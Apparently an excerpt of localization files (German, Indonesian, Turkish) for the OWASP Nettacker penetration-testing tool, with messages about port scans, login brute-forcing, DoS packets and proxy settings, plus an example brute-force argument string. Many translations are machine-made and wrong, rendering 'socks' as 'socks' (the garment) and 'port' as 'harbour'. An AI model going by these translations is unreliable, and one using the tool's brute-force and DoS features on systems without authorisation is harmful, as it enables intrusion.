"USERNAME": "NUTZERNAME",
"PASSWORD": "<PASSWORD>",
"PORT": "HAFEN",
"TYPE": "ART",
"DESCRIPTION": "BESCHREIBUNG",
"verbose_level": "Ausführlicher Modus (0-5) (Standard 0)",
"software_version": "Softwareversion anzeigen",
"check_updates": "auf Update überprüfen",
"outgoing_proxy": "Proxy für ausgehende Verbindungen (Socks). Beispiel socks5: 127.0.0.1:9050, "
"Socken: //127.0.0.1: 9050 Socken5: //127.0.0.1: 9050 oder socks4: socks4: //"
"127.0.0.1: 9050, Authentifizierung: socks: // Benutzername: Passwort @ 127.0.0.1,"
" socks4: // Benutzername: [email protected], socks5: //"
" Benutzername: [email protected]",
"valid_socks_address": "Bitte geben Sie eine gültige Socken Adresse und Port ein. Beispiel socks5:"
" 127.0.0.1:9050, socks: //127.0.0.1: 9050, socks5: //127.0.0.1: 9050 oder"
" socks4: socks4: //127.0.0.1: 9050, authentication: socks: // username: "
"password @ 127.0.0.1, socks4: // Benutzername: [email protected], socks5: "
"// Benutzername: [email protected]",
"connection_retries": "Wiederholt, wenn das Verbindungstimeout abgelaufen ist (Standard 3)",
"ftp_connection_timeout": "FTP-Verbindung zu {0}: {1} Zeitüberschreitung, Überspringen von {2}: {3}",
"login_successful": "ERFOLGREICH EINGELOGGT!",
"login_list_error": "ERFOLGREICH ERFOLGT, ERLAUBNIS FÜR LISTENBEFEHLE VERPFLICHTET!",
"ftp_connection_failed": "ftp-Verbindung zu {0}: {1} ist fehlgeschlagen und hat den gesamten Schritt "
"[Prozess {2} von {3}] übersprungen! gehe zum nächsten Schritt",
"input_target_error": "Das Eingabeziel für das Modul {0} muss DOMAIN, HTTP oder SINGLE_IPv4 lauten, "
"wobei {1} übersprungen wird.",
"user_pass_found": "Benutzer: {0} Pass: {1} Host: {2} Port: {3} gefunden!",
"file_listing_error": "(KEINE ERLAUBNIS FÜR LISTENDATEIEN)",
"trying_message": "{0} von {1} im Prozess {2} von {3} {4} versuchen: {5} ({6})",
"smtp_connection_timeout": "SMTP-Verbindung zu {0}: {1} Zeitüberschreitung, Überspringen von {2}: {3}",
"smtp_connection_failed": "Die SMTP-Verbindung zu {0}: {1} ist fehlgeschlagen. Der gesamte Schritt "
"[Prozess {2} von {3}] wurde übersprungen! gehe zum nächsten Schritt",
"ssh_connection_timeout": "ssh-Verbindung zu {0}: {1} Zeitüberschreitung, Überspringen von {2}: {3}",
"ssh_connection_failed": "ssh-Verbindung zu {0}: {1} ist fehlgeschlagen und hat den gesamten Schritt "
"[Prozess {2} von {3}] übersprungen! gehe zum nächsten Schritt",
"port/type": "{0} / {1}",
"port_found": "host: {0} port: {1} ({2}) gefunden!",
"target_submitted": "Ziel {0} gesendet!",
"current_version": "Sie führen die OWASP Nettacker-Version {0} {1} {2} {6} mit dem Codenamen {3} {4} {5}",
"feature_unavailable": "Diese Funktion ist noch nicht verfügbar! bitte starte \"git "
"clone https://github.com/viraintel/OWASP-Nettacker.git oder pip install -U "
"OWASP-Nettacker um die letzte Version zu erhalten.",
"available_graph": "Erstellen Sie ein Diagramm aller Aktivitäten und Informationen, Sie müssen "
"HTML-Ausgabe verwenden. verfügbare Diagramme: {0}",
"graph_output": "Um die Graphenfunktion zu verwenden, muss der Ausgabedateiname mit \".html\" oder "
"\".htm\" enden!",
"build_graph": "Baudiagramm ...",
"finish_build_graph": "Baugraph fertigstellen!",
"pentest_graphs": "Penetration Testing Graphs",
"graph_message": "Diese Grafik wurde von OWASP Nettacker erstellt. Diagramm enthält alle Modulaktivitäten,"
" Netzwerkkarte und vertrauliche Informationen. Bitte teilen Sie diese Datei nicht mit"
" anderen, wenn sie nicht zuverlässig ist.",
"nettacker_report": "OWASP Nettacker Bericht",
"nettacker_version_details": "Softwaredetails: OWASP Nettacker Version {0} [{1}] in {2}",
"no_open_ports": "Keine offenen Ports gefunden!",
"no_user_passwords": "kein Benutzer / Passwort gefunden!",
"loaded_modules": "{0} Module geladen ...",
"graph_module_404": "Dieses Grafikmodul wurde nicht gefunden: {0}",
"graph_module_unavailable": "Dieses Grafikmodul \"{0}\" ist nicht verfügbar",
"ping_before_scan": "ping vor dem Host scannen",
"skipping_target": "Das ganze Ziel {0} und die Scanmethode {1} werden ignoriert, da --ping-before-scan "
"wahr ist und nicht reagiert hat!",
"not_last_version": "Du verwendest nicht die letzte Version von OWASP Nettacker, bitte update.",
"cannot_update": "kann nicht nach Updates suchen, überprüfen Sie bitte Ihre Internetverbindung.",
"last_version": "Sie benutzen die letzte Version von OWASP Nettacker ...",
"directoy_listing": "Verzeichnisliste in {0} gefunden",
"insert_port_message": "Bitte geben Sie den Port über den Schalter -g "
"oder --methods-args anstelle der URL ein",
"http_connection_timeout": "http Verbindung {0} Zeitüberschreitung!",
"wizard_mode": "Starten Sie den Assistentenmodus",
"directory_file_404": "Kein Verzeichnis oder keine Datei für {0} in Port {1} gefunden",
"open_error": "{0} kann nicht geöffnet werden",
"dir_scan_get": "dir_scan_http_method Wert muss GET oder HEAD sein, setzen Sie den Standardwert auf GET.",
"list_methods": "listet alle Methoden args auf",
"module_args_error": "Modulargumente {0} können nicht abgerufen werden",
"trying_process": "{0} von {1} im Prozess {2} von {3} auf {4} ({5}) versuchen",
"domain_found": "Domäne gefunden: {0}",
"TIME": "ZEIT",
"CATEGORY": "KATEGORIE",
"module_pattern_404": "kann kein Modul mit {0} -Muster finden!",
"enter_default": "Bitte geben Sie {0} | ein Standard [{1}]>",
"enter_choices_default": "Bitte geben Sie {0} | ein Auswahl [{1}] | Standard [{2}]>",
"all_targets": "die Ziele",
"all_thread_numbers": "die Thread-Nummer",
"out_file": "der Ausgabedateiname",
"all_scan_methods": "die Scan-Methoden",
"all_scan_methods_exclude": "die auszuschließenden Scan-Methoden",
"all_usernames": "die Benutzernamen",
"all_passwords": "<PASSWORD>",
"timeout_seconds": "die Zeitüberschreitung Sekunden",
"all_ports": "die Portnummern",
"all_verbose_level": "die ausführliche Ebene",
"all_socks_proxy": "der Socken-Proxy",
"retries_number": "die Wiederholungsnummer",
"graph": "ein Graph",
"subdomain_found": "Subdomain gefunden: {0}",
"select_profile": "wähle Profil {0}",
"profile_404": "das Profil \"{0}\" wurde nicht gefunden!",
"waiting": "Warten auf {0}",
"vulnerable": "anfällig für {0}",
"target_vulnerable": "Ziel {0}: {1} ist anfällig für {2}!",
"no_vulnerability_found": "keine Verwundbarkeit gefunden! ({0})",
"Method": "Methode",
"API": "API",
"API_options": "API-Optionen",
"start_API": "Starten Sie den API-Dienst",
"API_host": "API-Hostadresse",
"API_port": "API-Portnummer",
"API_debug": "API-Debugmodus",
"API_access_key": "API-Zugriffsschlüssel",
"white_list_API": "erlauben Sie Whitelist-Hosts nur, sich mit der API zu verbinden",
"define_whie_list": "Definieren Sie Whitelist-Hosts, getrennt mit, (Beispiele: 127.0.0.1, "
"192.168.0.1/24, 10.0.0.1-10.0.0.255)",
"gen_API_access_log": "API-Zugriffsprotokoll generieren",
"API_access_log_file": "API-Zugriffsprotokolldateiname",
"API_port_int": "API-Port muss eine Ganzzahl sein!",
"unknown_ip_input": "unbekannter Eingangstyp, akzeptierte Typen sind SINGLE_IPv4, RANGE_IPv4, CIDR_IPv4",
"API_key": "* API-Schlüssel: {0}",
"ports_int": "Ports müssen Ganzzahlen sein! (z. B. 80 || 80,1080 || 80,1080-1300,9000,12000-15000)",
"through_API": "Durch die OWASP Nettacker API",
"API_invalid": "ungültiger API-Schlüssel",
"unauthorized_IP": "Ihre IP nicht autorisiert",
"not_found": "Nicht gefunden!",
"no_subdomain_found": "subdomain_scan: Keine Subdomain gegründet!",
"viewdns_domain_404": "viewdns_reverse_ip_lookup_scan: keine Domain gefunden!",
"browser_session_valid": "Ihre Browsersitzung ist gültig",
"browser_session_killed": "Ihre Browsersitzung wurde beendet",
"updating_database": "Aktualisierung der Datenbank ...",
"database_connect_fail": "Verbindung mit der Datenbank fehlgeschlagen!",
"inserting_report_db": "Bericht in die Datenbank einfügen",
"inserting_logs_db": "Einfügen von Protokollen in die Datenbank",
"removing_logs_db": "Entfernen alter Protokolle aus db",
"len_subdomain_found": "{0} Subdomain (s) gefunden!",
"len_domain_found": "{0} Domain (s) gefunden!",
"phpmyadmin_dir_404": "kein phpmyadmin Verzeichnis gefunden!",
"DOS_send": "Senden von DoS-Paketen an {0}",
"host_up": "{0} ist abgelaufen! Die Zeit bis zum Zurücksenden ist {1}",
"host_down": "Kann nicht {0} pingen!",
"root_required": "Dies muss als root ausgeführt werden",
"admin_scan_get": "admin_scan_http_method Wert muss GET oder HEAD sein, setzen Sie"
" den Standardwert auf GET.",
"telnet_connection_timeout": "Telnet-Verbindung zu {0}: {1} Zeitüberschreitung, Überspringen von {2}: {3}",
"telnet_connection_failed": "Die Telnet-Verbindung zu {0}: {1} ist fehlgeschlagen. Der ganze "
"Schritt [Prozess {2} von {3}] wurde übersprungen! gehe zum "
"nächsten Schritt",
"http_auth_success": "HTTP-Basisauthentifizierung erfolgreich - Host: {2}: {3}, Benutzer: {0}, "
"übergeben: {1} gefunden!",
"http_auth_failed": "HTTP-Basisauthentifizierung fehlgeschlagen an {0}: {3} mit {1}: {2}",
"http_form_auth_success": "HTTP-Authentifizierungserfolg - Host: {2}: {3}, Benutzer: "
"{0}, Pass: {1} gefunden!",
"http_form_auth_failed": "http-Formularauthentifizierung fehlgeschlagen an {0}: {3} mit {1}: {2}",
"http_ntlm_success": "http ntlm Authentifizierungserfolg - Host: {2}: {3}, Benutzer: {0},"
" Pass: {1} gefunden!",
"http_ntlm_failed": "Die http-ntlm-Authentifizierung ist mit {0}: {3} mit {1} fehlgeschlagen: {2}",
"no_response": "kann keine Antwort vom Ziel erhalten",
"category_framework": "Kategorie: {0}, Frameworks: {1} gefunden!",
"nothing_found": "Nichts gefunden auf {0} in {1}!",
"no_auth": "Keine Authentifizierung in {0} gefunden: {1}"
}
```
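A lookup sketch for the message table above; the placeholders in each entry are filled with `str.format`, and the format arguments below are made up:
```python
# Hypothetical lookup; the import path mirrors the file header above.
from lib.language.messages_de import all_messages

messages = all_messages()
print(messages["scan_started"])                          # Nettacker Motor gestartet ...
print(messages["found"].format("ftp", "127.0.0.1", 21))  # fills "{0} gefunden! ({1}: {2})"
```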
#### File: lib/language/messages_id.py
```python
def all_messages():
"""
keep all messages in id
Returns:
all messages in JSON
"""
return \
{
"scan_started": "Mesin Nettacker mulai ...",
"options": "python nettacker.py [opsi]",
"help_menu": "Tampilkan Menu Bantuan Nettacker",
"license": "Harap baca lisensi dan perjanjian https://github.com/viraintel/OWASP-Nettacker",
"engine": "Mesin",
"engine_input": "Opsi masukan mesin",
"select_language": "pilih bahasa {0}",
"range": "pindai semua IP dalam rentang",
"subdomains": "cari dan pindai subdomain",
"thread_number_connections": "nomor utas untuk koneksi ke host",
"thread_number_hosts": "nomor utas untuk host pemindaian",
"save_logs": "simpan semua log dalam file (results.txt, results.html, results.json)",
"target": "Target",
"target_input": "Opsi masukan target",
"target_list": "daftar target (s), terpisah dengan \",\"",
"read_target": "baca target (s) dari file",
"scan_method_options": "Pindai opsi metode",
"choose_scan_method": "pilih metode pemindaian {0}",
"exclude_scan_method": "pilih metode pemindaian untuk mengecualikan {0}",
"username_list": "daftar nama pengguna (s), terpisah dengan \",\"",
"username_from_file": "baca nama pengguna (s) dari file",
"password_seperator": "daftar kata sandi, terpisah dengan \",\"",
"read_passwords": "baca kata sandi (s) dari file",
"port_seperator": "daftar port (s), terpisah dengan \",\"",
"time_to_sleep": "waktu untuk tidur di antara setiap permintaan",
"error_target": "Tidak dapat menentukan target (s)",
"error_target_file": "Tidak dapat menentukan target (s), tidak dapat membuka file: {0}",
"thread_number_warning": "lebih baik menggunakan nomor utas lebih rendah dari 100, BTW kami terus ...",
"set_timeout": "mengatur waktu tunggu hingga {0} detik, itu terlalu besar, bukan? "
"dengan cara kita melanjutkan ...",
"scan_module_not_found": "modul pemindaian ini [{0}] tidak ditemukan!",
"error_exclude_all": "Anda tidak dapat mengecualikan semua metode pemindaian",
"exclude_module_error": "{0} modul yang Anda pilih untuk dikecualikan tidak ditemukan!",
"method_inputs": "masukkan input metode, contoh: ftp_brute_users = test, admin & "
"ftp_brute_passwds = baca_from_file: /tmp/pass.txt&ftp_brute_port=21",
"error_reading_file": "tidak bisa membaca file {0}",
"error_username": "Tidak dapat menentukan nama pengguna (s), tidak dapat membuka file: {0}",
"found": "{0} ditemukan! ({1}: {2})",
"error_password_file": "Tidak dapat menentukan kata sandi (s), tidak dapat membuka file: {0}",
"file_write_error": "file \"{0}\" tidak dapat ditulis!",
"scan_method_select": "silakan pilih metode pemindaian Anda!",
"remove_temp": "menghapus file temp!",
"sorting_results": "hasil penyortiran!",
"done": "selesai!",
"start_attack": "mulai menyerang {0}, {1} dari {2}",
"module_not_available": "modul ini \"{0}\" tidak tersedia",
"error_platform": "sayangnya versi perangkat lunak ini hanya bisa dijalankan di linux / osx / windows.",
"python_version_error": "Versi Python Anda tidak didukung!",
"skip_duplicate_target": "lewati target duplikat (beberapa subdomain / domain mungkin "
"memiliki IP dan Rentang yang sama)",
"unknown_target": "jenis target yang tidak diketahui [{0}]",
"checking_range": "memeriksa {0} rentang ...",
"checking": "memeriksa {0} ...",
"HOST": "TUAN RUMAH",
"USERNAME": "NAMA PENGGUNA",
"PASSWORD": "<PASSWORD>",
"PORT": "PELABUHAN",
"TYPE": "MENGETIK",
"DESCRIPTION": "DESKRIPSI",
"verbose_level": "tingkat modus verbose (0-5) (default 0)",
"software_version": "tampilkan versi perangkat lunak",
"check_updates": "memeriksa pembaruan",
"outgoing_proxy": "proxy koneksi keluar (kaus kaki). contoh kaus kaki5: 127.0.0.1:9050, "
"kaus kaki: //127.0.0.1: 9050 kaus kaki5: //127.0.0.1: 9050 atau kaus "
"kaki4: kaus kaki4: //127.0.0.1: 9050, autentikasi: kaus kaki: // "
"namapengguna: kata sandi @ 127.0.0.1, socks4: // username: [email protected], "
"socks5: // username: [email protected]",
"valid_socks_address": "masukkan alamat dan port kaus kaki yang valid. contoh kaus kaki5: "
"127.0.0.1:9050, kaus kaki: //127.0.0.1: 9050, kaus kaki5: //127.0.0.1:"
" 9050 atau kaus kaki4: kaus kaki4: //127.0.0.1: 9050, autentikasi: kaus"
" kaki: // namapengguna: kata sandi @ 127.0.0.1, socks4: // username: "
"[email protected], socks5: // username: [email protected]",
"connection_retries": "Retries ketika batas waktu koneksi (default 3)",
"ftp_connection_timeout": "koneksi ftp ke {0}: {1} timeout, skipping {2}: {3}",
"login_successful": "DITERUKAN SECARA SUKSES!",
"login_list_error": "DITERUKAN SECARA SUKSES, IZIN DITOLAK UNTUK DAFTAR!",
"ftp_connection_failed": "koneksi ftp ke {0}: {1} gagal, melewati seluruh langkah [proses {2} "
"{3}]! akan ke langkah berikutnya",
"input_target_error": "target input untuk {0} modul harus DOMAIN, HTTP atau SINGLE_IPv4, skipping {1}",
"user_pass_found": "pengguna: {0} lulus: {1} host: {2} port: {3} ditemukan!",
"file_listing_error": "(TIDAK ADA IZIN UNTUK DAFTAR DAFTAR)",
"trying_message": "mencoba {0} dari {1} dalam proses {2} dari {3} {4}: {5} ({6})",
"smtp_connection_timeout": "koneksi smtp ke {0}: {1} timeout, skipping {2}: {3}",
"smtp_connection_failed": "koneksi smtp ke {0}: {1} gagal, melewati seluruh langkah [proses {2} {3}]! "
"akan ke langkah berikutnya",
"ssh_connection_timeout": "koneksi ssh ke {0}: {1} timeout, skipping {2}: {3}",
"ssh_connection_failed": "koneksi ssh ke {0}: {1} gagal, melewati seluruh langkah [proses {2} {3}]!"
" akan ke langkah berikutnya",
"port/type": "{0} / {1}",
"port_found": "host: {0} port: {1} ({2}) ditemukan!",
"target_submitted": "target {0} dikirimkan!",
"current_version": "Anda menjalankan OWASP Nettacker versi {0} {1} {2} {6} dengan nama kode {3} {4} {5}",
"feature_unavailable": "fitur ini belum tersedia! silakan jalankan \"git clone "
"https://github.com/viraintel/OWASP-Nettacker.git atau install pip -U"
" OWASP-Nettacker untuk mendapatkan versi terakhir.",
"available_graph": "membangun grafik dari semua aktivitas dan informasi, Anda harus menggunakan "
"output HTML. grafik yang tersedia: {0}",
"graph_output": "untuk menggunakan fitur grafik, nama file output Anda harus diakhiri dengan "
"\".html\" atau \".htm\"!",
"build_graph": "membangun grafik ...",
"finish_build_graph": "selesaikan grafik bangunan!",
"pentest_graphs": "Grafik Pengujian Penetrasi",
"graph_message": "Grafik ini dibuat oleh OWASP Nettacker. Grafik berisi semua kegiatan modul, "
"peta jaringan, dan informasi sensitif. Jangan bagikan file ini dengan siapa pun "
"jika tidak dapat diandalkan.",
"nettacker_report": "Laporan OWASP Nettacker",
"nettacker_version_details": "Detail Perangkat Lunak: OWASP Nettacker versi {0} [{1}] di {2}",
"no_open_ports": "tidak ada port terbuka ditemukan!",
"no_user_passwords": "tidak ada pengguna / kata sandi yang ditemukan!",
"loaded_modules": "{0} modul dimuat ...",
"graph_module_404": "modul grafik ini tidak ditemukan: {0}",
"graph_module_unavailable": "modul grafik ini \"{0}\" tidak tersedia",
"ping_before_scan": "ping sebelum memindai host",
"skipping_target": "melewatkan seluruh target {0} dan metode pemindaian {1} karena "
"--ping-before-scan adalah benar dan tidak ada respon!",
"not_last_version": "Anda tidak menggunakan versi terakhir OWASP Nettacker, harap perbarui.",
"cannot_update": "tidak dapat memeriksa pembaruan, periksa koneksi internet Anda.",
"last_version": "Anda menggunakan versi terakhir OWASP Nettacker ...",
"directoy_listing": "daftar direktori ditemukan di {0}",
"insert_port_message": "tolong masukkan port melalui switch -g atau --methods-args sebagai ganti url",
"http_connection_timeout": "koneksi http {0} timeout!",
"wizard_mode": "mulai mode wizard",
"directory_file_404": "tidak ada direktori atau file yang ditemukan untuk {0} di port {1}",
"open_error": "tidak dapat membuka {0}",
"dir_scan_get": "nilai dir_scan_http_method harus GET atau HEAD, atur default ke GET.",
"list_methods": "daftar semua metode args",
"module_args_error": "tidak bisa mendapatkan argumen modul {0}",
"trying_process": "mencoba {0} dari {1} dalam proses {2} dari {3} pada {4} ({5})",
"domain_found": "domain ditemukan: {0}",
"TIME": "WAKTU",
"CATEGORY": "KATEGORI",
"module_pattern_404": "tidak dapat menemukan modul apa pun dengan pola {0}!",
"enter_default": "masukkan {0} | Default [{1}]>",
"enter_choices_default": "masukkan {0} | pilihan [{1}] | Default [{2}]>",
"all_targets": "targetnya",
"all_thread_numbers": "nomor utas",
"out_file": "nama file keluaran",
"all_scan_methods": "metode pemindaian",
"all_scan_methods_exclude": "metode pemindaian untuk dikecualikan",
"all_usernames": "nama pengguna",
"all_passwords": "<PASSWORD>",
"timeout_seconds": "batas waktu detik",
"all_ports": "nomor port",
"all_verbose_level": "tingkat verbose",
"all_socks_proxy": "proxy kaus kaki",
"retries_number": "nomor retries",
"graph": "sebuah grafik",
"subdomain_found": "subdomain ditemukan: {0}",
"select_profile": "pilih profil {0}",
"profile_404": "profil \"{0}\" tidak ditemukan!",
"waiting": "menunggu {0}",
"vulnerable": "rentan terhadap {0}",
"target_vulnerable": "target {0}: {1} rentan terhadap {2}!",
"no_vulnerability_found": "tidak ditemukan kerentanan! ({0})",
"Method": "metode",
"API": "API",
"API_options": "Opsi API",
"start_API": "memulai layanan API",
"API_host": "Alamat host API",
"API_port": "Nomor port API",
"API_debug": "Mode debug API",
"API_access_key": "Kunci akses API",
"white_list_API": "cukup izinkan host daftar putih untuk terhubung ke API",
"define_whie_list": "mendefinisikan host daftar putih, terpisah dengan, (contoh: 127.0.0.1, "
"192.168.0.1/24, 10.0.0.1-10.0.0.255)",
"gen_API_access_log": "menghasilkan log akses API",
"API_access_log_file": "Nama file log akses API",
"API_port_int": "Port API harus berupa bilangan bulat!",
"unknown_ip_input": "jenis masukan tidak dikenal, jenis yang diterima adalah "
"SINGLE_IPv4, RANGE_IPv4, CIDR_IPv4",
"API_key": "* Kunci API: {0}",
"ports_int": "port harus berupa bilangan bulat! (mis. 80 || 80,1080 || 80,1080-1300,9000,12000-15000)",
"through_API": "Melalui API OWASP Nettacker",
"API_invalid": "kunci API tidak valid",
"unauthorized_IP": "IP Anda tidak diotorisasi",
"not_found": "Tidak ditemukan!",
"no_subdomain_found": "subdomain_scan: tidak ada subdomain yang ditemukan!",
"viewdns_domain_404": "viewdns_reverse_ip_lookup_scan: tidak ada domain yang ditemukan!",
"browser_session_valid": "sesi browser Anda valid",
"browser_session_killed": "sesi browser Anda terbunuh",
"updating_database": "memperbarui basis data ...",
"database_connect_fail": "tidak bisa terhubung ke database!",
"inserting_report_db": "memasukkan laporan ke database",
"inserting_logs_db": "memasukkan log ke database",
"removing_logs_db": "menghapus log lama dari db",
"len_subdomain_found": "{0} subdomain (s) ditemukan!",
"len_domain_found": "{0} domain (s) ditemukan!",
"phpmyadmin_dir_404": "tidak ada dir phpmyadmin ditemukan!",
"DOS_send": "mengirim paket DoS ke {0}",
"host_up": "{0} sudah habis! Waktu yang diambil untuk melakukan ping kembali adalah {1}",
"host_down": "Tidak bisa melakukan ping {0}!",
"root_required": "ini harus dijalankan sebagai root",
"admin_scan_get": "admin_scan_http_method value harus GET atau HEAD, atur default ke GET.",
"telnet_connection_timeout": "koneksi telnet ke {0}: {1} timeout, skipping {2}: {3}",
"telnet_connection_failed": "koneksi telnet ke {0}: {1} gagal, melewati seluruh langkah [proses "
"{2} dari {3}]! akan ke langkah berikutnya",
"http_auth_success": "sukses otentikasi dasar http - host: {2}: {3}, pengguna: {0}, lulus: {1} ditemukan!",
"http_auth_failed": "Otentikasi dasar http gagal {0}: {3} menggunakan {1}: {2}",
"http_form_auth_success": "keberhasilan otentikasi bentuk http - host: {2}: {3},"
" pengguna: {0}, lulus: {1} ditemukan!",
"http_form_auth_failed": "Otentikasi bentuk http gagal {0}: {3} menggunakan {1}: {2}",
"http_ntlm_success": "Keberhasilan autentikasi ntlm http: host: {2}: {3}, pengguna: "
"{0}, lulus: {1} ditemukan!",
"http_ntlm_failed": "Otentikasi ntlm http gagal {0}: {3} menggunakan {1}: {2}",
"no_response": "tidak bisa mendapatkan respons dari target",
"category_framework": "kategori: {0}, kerangka kerja: {1} ditemukan!",
"nothing_found": "tidak ditemukan apa pun di {0} dalam {1}!",
"no_auth": "Tidak ada auth yang ditemukan pada {0}: {1}"
}
```
#### File: lib/language/messages_tr.py
```python
def all_messages():
"""
keep all messages in tr
Returns:
all messages in JSON
"""
return \
{
"scan_started": "Nettacker motoru başladı ...",
"options": "python nettacker.py [seçenekler]",
"help_menu": "Nettacker Yardım Menüsünü Göster",
"license": "Lütfen lisans ve sözleşmeleri okuyun https://github.com/viraintel/OWASP-Nettacker",
"engine": "Motor",
"engine_input": "Motor girişi seçenekleri",
"select_language": "bir dil seçin {0}",
"range": "tüm IP'leri aralıkta tara",
"subdomains": "alt alanları bul ve tara",
"thread_number_connections": "Bir ana bilgisayara bağlantı için iş parçacığı numaraları",
"thread_number_hosts": "tarama konakları için iş parçacığı numaraları",
"save_logs": "tüm kayıtları dosyaya kaydet (results.txt, results.html, results.json)",
"target": "Hedef",
"target_input": "Hedef giriş seçenekleri",
"target_list": "hedef (ler) listesi, \",\" ile ayrı",
"read_target": "dosyadan hedef (ler) oku",
"scan_method_options": "Tarama yöntemi seçenekleri",
"choose_scan_method": "tarama yöntemini seçin {0}",
"exclude_scan_method": "{0} öğesini hariç tutmak için tarama yöntemini seçin",
"username_list": "kullanıcı adı (lar) listesi, \",\" ile ayrı",
"username_from_file": "dosyadan kullanıcı adlarını oku",
"password_seperator": "şifre listesi \",\" ile ayrı",
"read_passwords": "<PASSWORD> şifre (ler) oku",
"port_seperator": "port (lar) listesi, \",\" ile ayrı",
"time_to_sleep": "her istek arasında uyumak için zaman",
"error_target": "Hedef (ler) belirtilemiyor",
"error_target_file": "Dosya açılamayan hedef (ler) belirtilemiyor: {0}",
"thread_number_warning": "100'den daha düşük iplik numarası kullanmak daha iyi, BTW devam ediyor ...",
"set_timeout": "zaman aşımını {0} saniye olarak ayarlayın, çok büyük değil mi? devam ettikçe ...",
"scan_module_not_found": "bu tarama modülü [{0}] bulunamadı!",
"error_exclude_all": "tüm tarama yöntemlerini hariç tutamazsınız",
"exclude_module_error": "hariç tutmak için seçtiğiniz {0} modülü bulunamadı!",
"method_inputs": "yöntem girişlerini girin, örneğin: ftp_brute_users = test, admin & ftp_brute_passwds "
"= read_from_file: /tmp/pass.txt&ftp_brute_port=21",
"error_reading_file": "{0} dosyası okunamıyor",
"error_username": "Dosya açılamayan kullanıcı adı (lar) belirtilemez: {0}",
"found": "{0} bulundu! ({1}: {2})",
"error_password_file": "Dosya açılamayan şifre (ler) belirtilemez: {0}",
"file_write_error": "\"{0}\" dosyası yazılabilir değil!",
"scan_method_select": "lütfen tarama yönteminizi seçin!",
"remove_temp": "geçici dosyaları kaldırarak!",
"sorting_results": "sıralama sonuçları!",
"done": "bitmiş!",
"start_attack": "{0}, {1} arasında {1} saldırmaya başlama",
"module_not_available": "\"{0}\" bu modül mevcut değil",
"error_platform": "ne yazık ki yazılımın bu sürümü sadece linux / osx / windows üzerinde çalıştırılabilir.",
"python_version_error": "Python sürümünüz desteklenmiyor!",
"skip_duplicate_target": "yinelenen hedefi atla (bazı alt alanlar / alan adları aynı IP'ye ve "
"Aralıklara sahip olabilir)",
"unknown_target": "bilinmeyen hedef türü [{0}]",
"checking_range": "{0} aralığında kontrol ediliyor ...",
"checking": "{0} kontrol ediliyor ...",
"HOST": "HOST",
"USERNAME": "K<NAME>",
"PASSWORD": "<PASSWORD>",
"PORT": "LİMAN",
"TYPE": "TİP",
"DESCRIPTION": "AÇIKLAMA",
"verbose_level": "ayrıntılı mod düzeyi (0-5) (varsayılan 0)",
"software_version": "yazılım sürümünü göster",
"check_updates": "güncellemeleri kontrol ediniz",
"outgoing_proxy": "giden bağlantılar proxy'si (socks). örnek socks5: 127.0.0.1: 9050, çorap: //127.0.0.1:"
" 9050 socks5: //127.0.0.1: 9050 veya socks4: çorap4: //127.0.0.1: 9050, kimlik"
" doğrulama: çorap: // kullanıcı adı: şifre @ 127.0.0.1, socks4: // kullanıcı adı:"
" [email protected], socks5: // kullanıcı adı: [email protected]",
"valid_socks_address": "lütfen geçerli bir çorap adresi ve port giriniz. örnek socks5: 127.0.0.1: 9050,"
" çorap: //127.0.0.1: 9050, çorap5: //127.0.0.1: 9050 veya çorap4: çorap4: "
"//127.0.0.1: 9050, kimlik doğrulama: çorap: // kullanıcı adı: şifre @ 127.0.0.1, "
"socks4: // kullanıcı adı: [email protected], socks5: // kullanıcı adı: "
"[email protected]",
"connection_retries": "Bağlantı zaman aşımı olduğunda tekrar dener (varsayılan 3)",
"ftp_connection_timeout": "{0} ile ftp bağlantısı: {1} zaman aşımı, {2} atlama: {3}",
"login_successful": "BAŞARIYLA GİRİŞ YAPTI!",
"login_list_error": "BAŞARILI OLMAK ÜZERE, LİSANS KOMİSYONU İÇİN İZİN VERİLDİ!",
"ftp_connection_failed": "{0} için ftp bağlantısı: {1} başarısız oldu, tüm adımı atladım {süreç {2}} "
"{2}]! bir sonraki adıma geçmek",
"input_target_error": "{0} modülü için giriş hedefi {1} atlama, DOMAIN, HTTP veya SINGLE_IPv4 olmalıdır",
"user_pass_found": "user: {0} pass: {1} host: {2} bağlantı noktası: {3} bulundu!",
"file_listing_error": "(LİSTE DOSYALARI İÇİN İZİN YOK)",
"trying_message": "{3} {4}: {5} ({6}) 'daki {2} sürecindeki {1} hesabının {0} değerini denemek",
"smtp_connection_timeout": "{0} için smtp bağlantısı: {1} zaman aşımı, {2} atlama: {3}",
"smtp_connection_failed": "{0} için smtp bağlantısı: {1} başarısız oldu, tüm adımı atla {süreç {2}} {2}]!"
" bir sonraki adıma geçmek",
"ssh_connection_timeout": "{0} ile ssh bağlantısı: {1} zaman aşımı, {2} atlama: {3}",
"ssh_connection_failed": "{0} için ssh bağlantısı: {1} başarısız oldu, tüm adımı atladı {süreç {2} {2}]!"
" bir sonraki adıma geçmek",
"port/type": "{0} / {1}",
"port_found": "host: {0} port: {1} ({2}) bulundu!",
"target_submitted": "{0} hedefi gönderildi!",
"current_version": "{0} {1} {2} {6} OWASP Nettacker sürümünü {3} {4} {5} kod adıyla çalıştırıyorsunuz",
"feature_unavailable": "Bu özellik henüz mevcut değil! son sürümü almak için lütfen git klon "
"https://github.com/viraintel/OWASP-Nettacker.git veya pip install -U"
" OWASP-Nettacker çalıştırın.",
"available_graph": "Tüm aktiviteler ve bilgiler için bir grafik oluşturmak, HTML çıkışı kullanmalısınız."
" mevcut grafikler: {0}",
"graph_output": "Grafik özelliğini kullanmak için çıktı dosya adınız \".html\" veya \".htm\" "
"ile bitmelidir!",
"build_graph": "bina grafiği ...",
"finish_build_graph": "bina grafiğini bitir!",
"pentest_graphs": "Sızma Test Grafikleri",
"graph_message": "Bu grafik OWASP Nettacker tarafından oluşturuldu. Grafik tüm modül aktivitelerini, "
"ağ haritasını ve hassas bilgileri içerir. Lütfen güvenilir değilse, bu dosyayı "
"kimseyle paylaşmayın.",
"nettacker_report": "OWASP Nettacker Raporu",
"nettacker_version_details": "Yazılım Ayrıntıları: {2} içindeki OWASP Nettacker sürümü {0} [{1}]",
"no_open_ports": "açık bağlantı noktası bulunamadı!",
"no_user_passwords": "kull<PASSWORD>cı / ş<PASSWORD> bulunamadı!",
"loaded_modules": "{0} modül yüklendi ...",
"graph_module_404": "Bu grafik modülü bulunamadı: {0}",
"graph_module_unavailable": "bu \"{0}\" grafik modülü mevcut değil",
"ping_before_scan": "ana bilgisayarı taramadan önce ping",
"skipping_target": "Taramadan önce --ping -ping gerçek olduğundan ve yanıt vermediğinden {0} hedefleme "
"yöntemini ve {1} tarama yöntemini atlıyor!",
